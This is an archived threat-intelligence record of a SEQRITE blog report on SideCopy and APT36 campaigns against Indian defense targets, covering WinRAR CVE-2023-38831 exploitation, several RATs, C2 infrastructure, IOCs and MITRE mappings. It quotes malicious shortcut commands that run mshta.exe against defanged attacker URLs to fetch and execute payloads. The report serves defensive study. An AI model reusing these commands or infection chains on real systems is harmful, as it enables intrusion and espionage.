{
	"id": "53ceafff-a3c8-4526-bb52-9a65b573baae",
	"created_at": "2026-04-06T00:09:32.315897Z",
	"updated_at": "2026-04-10T13:11:57.713773Z",
	"deleted_at": null,
	"sha1_hash": "1391f10eb893f4c3853f113bf29fe8ea7aba8e77",
	"title": "SideCopy’s Multi-platform Onslaught: Leveraging WinRAR Zero-Day and Linux Variant of Ares RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2444497,
	"plain_text": "SideCopy’s Multi-platform Onslaught: Leveraging WinRAR Zero-Day and Linux Variant of Ares RAT\r\nBy Sathwik Ram Prakki\r\nPublished: 2023-11-06 · Archived: 2026-04-05 17:05:01 UTC\r\nSEQRITE Labs APT-Team has discovered multiple campaigns of APT SideCopy targeting Indian government and defense entities in the past few months. The threat group is now exploiting the recent WinRAR vulnerability CVE-2023-38831 (see our advisory for more details) to deploy AllaKore RAT, DRat and additional payloads. The compromised domains used by SideCopy to host payloads are reused multiple times and resolve to the same IP address. It has also deployed a Linux variant of an open-source agent called Ares RAT, whose stager payload shares code with its parent threat group Transparent Tribe (APT36). Conducting multi-platform attacks simultaneously with the same decoys and naming convention, both SideCopy and APT36 share infrastructure and code to aggressively target India.\r\nIn this blog, we’ll delve into the technicalities of two such campaigns we encountered during our telemetry analysis. We have observed more similar ongoing campaigns unfold and expect them to continue as the Israel-Hamas conflict intensifies, where not only Pakistan-aligned hacktivists but also other groups against Israel are targeting Indian websites with DDoS, defacement, and data breach attacks.\r\nThreat Actor Profile\r\nSideCopy is a Pakistan-linked Advanced Persistent Threat group that has been targeting South Asian countries, primarily Indian Defense and Afghanistan government entities, since at least 2019. Almost every month this year, a new attack campaign has been observed in our telemetry, with changes over time: additional stages with Double Action RAT, a new .NET-based RAT, and TTPs such as PowerShell remote execution have been uncovered by our team. 
Its arsenal includes Action RAT, AllaKore RAT, Reverse RAT, Margulas RAT and more.\r\nThis group is associated as a sub-division of Transparent Tribe (APT36), which has been persistently targeting the Indian Military and is continuing to target university students aggressively this year to share student data, possibly with terrorist groups for recruitment. It has updated its Linux malware arsenal this year with Poseidon and other utilities. Active since 2013, it has continuously used payloads such as Crimson RAT, Capra RAT, and Oblique RAT in its campaigns.\r\nPakistani agents have used honey traps to lure defense personnel, creating an immense impact and damage by stealing confidential intel in this form of cyber espionage.\r\nAnalysis of Campaign-1\r\nThe first campaign of SideCopy observed is spread via a phishing link that downloads an archive file named “Homosexuality – Indian Armed Forces.” The decoy document is related to NSRO and is called “ACR.pdf” or “ACR_ICR_ECR_Form_for_Endorsement_New_Policy.pdf.”\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 1 of 21\n\nFig. 1 – Decoy PDF\r\nInterestingly, we found the same decoy PDF is utilized by the Linux variant of Ares RAT, which was first seen in the last week of August on VirusTotal. Both the compromised domains used resolved to the same IP address, as shown in the figure below. The domains used in the April (‘ssynergy[.]in’) and May (‘elfinindia[.]com’) campaigns also point to the same IP. Moreover, the archive files hosted on different domains have the same name, indicating the reuse of compromised domains.\r\nFig. 
2 – Infection chain-1 with the same IP\r\nThe phishing URL targeting the Windows platform points to sunfireglobal[.]in, a compromised domain that is not alive at the time of writing and resolves to the IP 162.241.85[.]104. The URL is:\r\nhxxps://sunfireglobal[.]in/public/core/homo/Homosexuality%20-%20Indian%20Armed%20Forces.zip\r\nThis contains a malicious shortcut file in a double-extension format named “Homosexuality – Indian Armed Forces ․pdf.lnk” that triggers a remote HTA file as:\r\nC:\\Windows\\System32\\mshta.exe “hxxps://sunfireglobal[.]in/public/assests/files/db/acr/” \u0026\u0026 tar.exe\r\nIt contains two embedded files that are base64 encoded; one is the decoy PDF, and the other is a DLL. Only minor changes were observed in the HTA, and the functionality remains the same: check the .NET version, fetch the AV installed, decode the DLL, and run it in memory.\r\nAfter the decoy file is opened by the DLL (preBotHta), it beacons to the same domain and downloads an HTA and the final DLL contents to their target paths. The downloaded HTA is saved as “seqrite.jpg” in the TEMP folder, later moved to the target folder, and executed. Depending on the AV present (SEQRITE, Quick Heal, Kaspersky, Avast, Avira, Bitdefender, or Windows Defender), it executes the final DLL payload.\r\nFig. 3 – DLL preBotHta run in-memory\r\nLegitimate Windows apps like Credential wizard (credwiz.exe) or EFS REKEY wizard (rekeywiz.exe) are copied beside the target to sideload the DLL. Persistence is maintained via the Startup folder or a Run registry key to load the final RAT payload on system reboot. (Detailed analysis of Action RAT and all other payloads can be found in our previous whitepaper.)\r\nAnother archive file with the same name, “Homosexuality – Indian Armed Forces.zip,” is seen that contains an ELF file. 
It is spread using a domain named “occoman[.]com,” resolving to the same IP address as sunfireglobal[.]in, showing the sharing of IP between compromised domains.\r\nFig. 4 – Content of both the archives\r\nDifferent file names for this Golang-based Linux malware, which is masqueraded as a PDF, were found as:\r\nHomosexuality – Indian Armed Forces ․pdf 2023-10-24\r\nUnit Training Program ․pdf 2023-09-20\r\nSocial Media Usage ․pptx 2023-08-30\r\nUtilizing the GoReSym plugin with IDA, we can extract function metadata as the binary is stripped (see our in-depth analysis of Go-based Warp malware for plugin details).\r\nThe process flow is similar to the first stage seen in the case of the Poseidon agent (observed by Uptycs and Zscaler), having the exact same target location, though this stage is not compiled using PyInstaller:\r\n1. Create a crontab to maintain persistence through system reboot under the current username.\r\n2. Download the decoy to the target directory “/.local/share” and open it.\r\n3. Download the Ares agent as “/.local/share/updates” and execute it.\r\nFig. 5 – Process flow of Stage-1\r\nAfter extracting the contents of the final PyInstaller payload, two Python-compiled files of interest (agent.pyc and config.pyc) are retrieved. Decompiling and examining them leads to an open-source Python RAT called Ares. The URL format used to ping the server is “hxxps://(host)/api/(uid)/hello” and the request includes the platform, hostname and username of the victim machine. 
It supports the following 13 commands for C2 communication.\r\nCommand Description\r\nupload Uploads a local file to the server\r\ndownload Downloads a file via HTTP(s)\r\nzip Creates a zip archive of a file or folder\r\ncd Change the current directory\r\nscreenshot Takes a screenshot and uploads it to the server\r\npython Runs a Python command or a Python file\r\npersist Installs the agent via AutoStart directory\r\nclean Uninstalls the agent\r\nexit Kills the agent\r\ncrack Removes persistence and kills the agent\r\nlistall List file directory and upload it to the server\r\nhelp Display the help\r\n\u003ccommand\u003e Executes a shell command and returns its output\r\nNo major changes were observed in the agent apart from changing the name from ares to gedit, and the server used by the agent is present in the config file: 161.97.151[.]200:7015. Both the agent and config scripts include the name ‘lee’, pointing to the same agent as referred to by Lumen.\r\nFig. 6 – Config file\r\nFig. 7 – Agent script\r\nThis payload is also named “bossupdate,” a naming convention similar to Poseidon and other utilities of Transparent Tribe that start with the ‘boss’ prefix. APT36 is aiming for the operating system BOSS, developed in India for government entities, and is constantly expanding its Linux arsenal. Back in 2021, SideCopy was linked to the same RAT by QiAnXin’s Red Raindrop Team, and later to a forked version called BackNet by Telsy.\r\nAnalysis of Campaign-2\r\nThe second campaign has the same scenario, where IP sharing is seen not only with the compromised domains but also with the C2 infrastructure. 
Exploitation of the recent WinRAR vulnerability CVE-2023-38831 is done via phishing, which downloads malicious archive files. Upon opening the archive files, a PDF file and a folder with the same name are present.\r\nFig. 8 – Archives used for WinRAR exploitation\r\nOpening the PDF triggers the vulnerability, quietly launching the payload inside the folder via the ShellExecute function of the WinRAR application. The decoy PDF is related to an organization called the ‘All India Association of Non-Gazetted Officers’ (AIANGOs), which mentions a peaceful protest program to the Indian Ministry of Defense. Headquartered in Mumbai, AIANGOs was recognized by GOI, MoD in 2000 under CCS(RSA) Rule 1993 and affiliated to CDRA, as mentioned on their X (Twitter) page.\r\nFig. 9 – Decoy used in WinRAR exploitation\r\nThe payload present in the folder is the AllaKore RAT agent, which has the functionality to steal system information, log keystrokes, take screenshots, upload \u0026 download files, and take remote access of the victim machine to send commands and upload stolen data to the C2. Additionally, more connections have been made between the C2 utilized and its previous campaign, as described below:\r\nFig. 10 – Infection chain-2 with IP sharing with domains and C2\r\nCorrelation\r\nA similar attack chain of SideCopy is observed with the lure document “DocScanner-Oct” referring to the Ministry of Defense’s Saudi Delegation. 
The same decoy was observed to be used by SideCopy \u0026 APT36 earlier in the April \u0026 May campaigns, respectively.\r\nThe compromised domain in this chain, ‘rockwellroyalhomes[.]com’, resolves to the same IP 103.76.213[.]95 used with the domain ‘isometricsindia[.]co.in,’ which was observed to be used by them in an August campaign utilizing the theme “US vs. China trade war.”\r\nThe final payload DRat connects with the IP 38.242.149[.]89 for C2 communication, the same IP used with AllaKore RAT.\r\nA similar phishing URL is found on the same “rockwellroyalhomes” domain, named similarly “DocScanner_AUG_2023.zip.” This leads to another Ares RAT sample, connecting to a C2 with the IP 38.242.220[.]166:9012, where the decoy again points to India’s Ministry of Defense regarding the “Parliament Matter.”\r\nFig. 8 – Decoy used with Ares RAT\r\nThe phishing URL points to rockwellroyalhomes[.]com, a compromised domain that resolves to the IP 103.76.231[.]95:\r\nhxxps://www.rockwellroyalhomes.com/js/FL/DocScanner-Oct.zip\r\nThis contains a malicious shortcut file in a double-extension format named “DocScanner-Oct.zip․pdf.lnk,” that triggers a remote HTA file as:\r\nC:\\Windows\\System32\\mshta.exe hxxps://www.rockwellroyalhomes.com/js/content/ \u0026 mshta.exe\r\nIt contains embedded files that are base64 encoded; they are the decoy PDF, a DLL, and an EXE. 
Similar checks for the anti-virus present on the victim machine are done; it then opens the decoy and drops the final DRat payload, a new Remote Access Trojan named from the PDB path:\r\nd:\\Projects\\C#\\D-Rat\\DRat Client\\Tenure\\obj\\Release\\MSEclipse.pdb\r\nThe 13 commands supported have the following functionality:\r\nDecoded Command Functionality\r\ngetInformitica Send system info – User \u0026 OS name, timestamp, Start-up path\r\nsup Send a ‘supconfirm’ message to start receiving commands\r\nclose Send a ‘closure’ message to close the connection and exit\r\nKaamindina Check running status\r\ndel Delete specific directory (or) file and send confirmation\r\nenterPath Enter a specific directory and send attributes for each file \u0026 sub-folder\r\nbackPath Send the current working directory\r\ndriveList Fetch disk info and DeviceID using ‘SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3’\r\nfdl Upload file attributes\r\nfdIConfirm Upload file\r\nfup Download file\r\nfupexec Download and execute (1)\r\nsupexec Download and execute (2)\r\nFig. 8 – Reuse of decoy with DRat\r\nAnother campaign has been found with similar targeting of Windows and Linux platforms simultaneously. A new payload for Windows, named Key RAT, is deployed in this case along with Ares RAT. 
IOCs for this third campaign have been included at the end.\r\nC2 Infrastructure and Domains\r\nAll the C2 servers are registered in Germany to Contabo GmbH, commonly used by both the Pakistan-linked APTs.\r\nIP Hostname Payload\r\n38.242.149[.]89 vmi1433024.contaboserver.net AllaKore RAT and DRat\r\n207.180.192[.]77 vmi747785.contaboserver.net Key RAT\r\n38.242.220[.]166 vmi1390334.contaboserver.net Ares RAT\r\n161.97.151[.]220 vmi1370228.contaboserver.net Ares RAT\r\nOne Ares server that is linked with multiple baits, 38.242.220[.]166, is running a pfSense firewall on port 9012 for C2 communication.\r\nFig. 9 – Ares server details\r\nFig. 10 – pfsense login page of Ares server\r\nAll the compromised domains used by SideCopy this year have GoDaddy as registrar with a HostGator server name. Whois details are:\r\nIP Domain Campaign Registrant\r\n103.76.213[.]95 isometricsindia[.]co.in August Ozanera Pvt. Ltd., Mumbai\r\n103.76.213[.]95 rockwellroyalhomes[.]com October Tempe, Arizona, US\r\n162.241.85[.]104 sunfireglobal[.]in October West Bengal, India\r\n162.241.85[.]104 occoman[.]com August Tempe, Arizona, US\r\n162.241.85[.]104 elfinindia[.]com May Tempe, Arizona, US\r\n162.241.85[.]104 ssynergy[.]in April West Bengal, India\r\nIP details: 103.76.213[.]95 – Org: Spectra Technologies, ISP: CtrlS, Delhi, India (AS18229); 162.241.85[.]104 – Org \u0026 ISP: Unified Layer, Provo, Utah, US (AS46606).\r\nWe have seen the machine name ‘desktop-g4b6mh4’ associated with a huge number of shortcut files this year. 
It is not only observed in these campaigns; new machine names have also been used by the threat actor:\r\ndesktop-87p7en5\r\ndesktop-ey8nc5b\r\nConclusion \u0026 Attribution\r\nExpanding its arsenal with a zero-day vulnerability, SideCopy consistently targets Indian defense organizations with various remote access trojans. Based on the attack chain, selection of target, baits used and infrastructure, these campaigns are attributed to SideCopy with high confidence. APT36 is constantly expanding its Linux arsenal, and it is observed sharing its Linux stagers with SideCopy to deploy an open-source Python RAT called Ares. At the same time, we have observed telemetry hits for this campaign in multiple Indian cities, showing an uptick in activity amidst the Israel-Hamas conflict. Overall, both these and additional campaigns show connections through the sharing of code and infrastructure between these closely related threat groups.\r\nSEQRITE Protection\r\nLNK.Trojan.48283.GC SideCopy.Trojan.48284.GC JS.Trojan.47685\r\nLNK.Dropper.47686.GC SideCopy.Trojan.48285.GC JS.Sidecopy.47539.GC\r\nLNK.Sidecopy.47538.GC Trojan.SideCopy.S30112863 JS.Sidecopy.47540\r\nELF.Agent.48298.GC Trojan.SideCopy.S30112905 JS.SideCopy.42911\r\nELF.Agent.48286.GC Trojan.Sidecopy.S30112904 Trojan.SideCopy\r\nScript.Trojan.47763 TrojanAPT.SideCopy.PB1\r\nPrecautions to be taken\r\nIt is necessary to stay protected from such critical cyber-attacks by taking the following precautions:\r\nAvoid clicking on any unverified links from unknown sources.\r\nDo not download and open any attachments, especially archive files.\r\nUse endpoint protection to stay ahead in the ongoing threat landscape.\r\nRegularly update your OS and software apps to fix known vulnerabilities.\r\nAdd password-protection to confidential documents and sensitive 
information.\r\nIOCs\r\nPDB\r\nd:\\Projects\\C#\\D-Rat\\DRat Client\\Tenure\\obj\\Release\\MSEclipse.pdb\r\nC:\\Users\\Boss\\Desktop\\test\\Client\\Client\\obj\\Release\\Onlyme.pdb\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Name\r\nResource Development T1583.001 Acquire Infrastructure: Domains\r\nResource Development T1584.001 Compromise Infrastructure: Domains\r\nResource Development T1588.001 Obtain Capabilities: Malware\r\nResource Development T1588.002 Obtain Capabilities: Tool\r\nResource Development T1608.001 Stage Capabilities: Upload Malware\r\nResource Development T1608.005 Stage Capabilities: Link Target\r\nInitial Access T1566.001 Phishing: Spearphishing Attachment\r\nInitial Access T1566.002 Phishing: Spearphishing Link\r\nExecution T1106 Native API\r\nExecution T1129 Shared Modules\r\nExecution T1059 Command and Scripting Interpreter\r\nExecution T1047 Windows Management Instrumentation\r\nExecution T1203 Exploitation for Client Execution\r\nExecution T1204.001 User Execution: Malicious Link\r\nExecution T1204.002 User Execution: Malicious File\r\nPersistence T1053.003 Scheduled Task/Job: Cron\r\nPersistence T1547.001 Registry Run Keys / Startup Folder\r\nPersistence T1547.013 Boot or Logon Autostart Execution: XDG Autostart Entries\r\nDefense Evasion T1036.005 Masquerading: Match Legitimate Name or Location\r\nDefense Evasion T1140 Deobfuscate/Decode Files or Information\r\nDefense Evasion T1218.005 System Binary Proxy Execution: Mshta\r\nDefense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading\r\nDefense Evasion T1222.002 File and Directory Permissions Modification: Linux\r\nDefense Evasion T1027.009 Obfuscated Files or Information: Embedded Payloads\r\nDefense Evasion T1027.010 Obfuscated Files or Information: Command Obfuscation\r\nDiscovery T1012 Query Registry\r\nDiscovery T1033 System Owner/User Discovery\r\nDiscovery T1057 Process Discovery\r\nDiscovery T1082 System Information Discovery\r\nDiscovery T1083 File and Directory Discovery\r\nDiscovery T1016.001 System Network Configuration Discovery\r\nDiscovery T1518.001 Software Discovery: Security Software Discovery\r\nCollection T1005 Data from Local System\r\nCollection T1056.001 Input Capture: Keylogging\r\nCollection T1074.001 Data Staged: Local Data Staging\r\nCollection T1119 Automated Collection\r\nCollection T1113 Screen Capture\r\nCollection T1125 Video Capture\r\nCommand and Control T1105 Ingress Tool Transfer\r\nCommand and Control T1571 Non-Standard Port\r\nCommand and Control T1573 Encrypted Channel\r\nCommand and Control T1071.001 Application Layer Protocol: Web Protocols\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nSource: 
https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/"
	],
	"report_names": [
		"sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00",
			"created_at": "2023-01-06T13:46:39.30167Z",
			"updated_at": "2026-04-10T02:00:03.280161Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [],
			"source_name": "MISPGALAXY:SideCopy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434172,
	"ts_updated_at": 1775826717,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1391f10eb893f4c3853f113bf29fe8ea7aba8e77.pdf",
		"text": "https://archive.orkl.eu/1391f10eb893f4c3853f113bf29fe8ea7aba8e77.txt",
		"img": "https://archive.orkl.eu/1391f10eb893f4c3853f113bf29fe8ea7aba8e77.jpg"
	}
}